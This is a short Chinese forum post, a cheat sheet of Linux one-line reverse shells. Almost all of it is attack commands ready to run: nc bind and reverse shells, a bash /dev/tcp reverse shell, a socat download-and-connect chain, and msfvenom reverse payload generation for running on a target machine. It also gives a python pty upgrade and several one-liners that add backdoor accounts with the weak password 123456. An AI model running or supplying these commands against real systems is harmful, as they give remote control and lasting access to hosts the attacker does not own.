十二12 发表于 2018-8-24 09:35:02

linux各种一句话反弹shell总结

1 nc开启本地监听发布bash服务  

  
1    # nc -lvvp 12345 -t -e /bin/bash
  

  
2 常用反弹shell一句话
  

  
(1) bash 反弹一句话
  
1    # bash -i >& /dev/tcp/192.168.1.123/12345 0>&1
  

  
(2) nc 反弹一句话
  
1    # nc 192.168.1.123 12345 -t -e /bin/bash
  

  
(3) socat 反弹一句话
  
123    # wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat      # 第一步:下载socat到/tmp目录下# chmod 755 /tmp/socat          # 第二步:给socaat授予可以执行权限# /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.31.41:12345      # 第三步:反弹shell到目标主机的12345端口
  

  
3 利用msfvenom获取反弹一句话
  

  
(1) 查询 reverse payload 反弹路径
  
1    # msfvenom -l payloads 'cmd/unix/reverse'
  

  
(2) 生成相关反弹一句话
  
1    # msfvenom -p cmd/unix/reverse_xxxx lhost=1.1.1.1 lport=12345 R
  

  
剩下的就是将生成的payload 反弹一句话直接复制到靶机上直接运行即反弹一个shell出来。
  

  
4 使用python获取标准shell
  

  
直接在获取的废标准shell上直接运行一下python 一句话即可获取一个标准的shell。
  
1    # python -c "import pty;pty.spawn('/bin/bash')"
  

  
5 linux 一句话添加账户
  
(1)chpasswd 方法
  
1    # useradd guest;echo 'guest:123456'|chpasswd
  

  
(2)useradd -p 方法
  
1    # useradd -p `openssl passwd 123456` guest
  

  
(3)echo -e 方法
  
1    # useradd test;echo -e "123456\n123456\n" |passwd test


页: [1]
查看完整版本: linux各种一句话反弹shell总结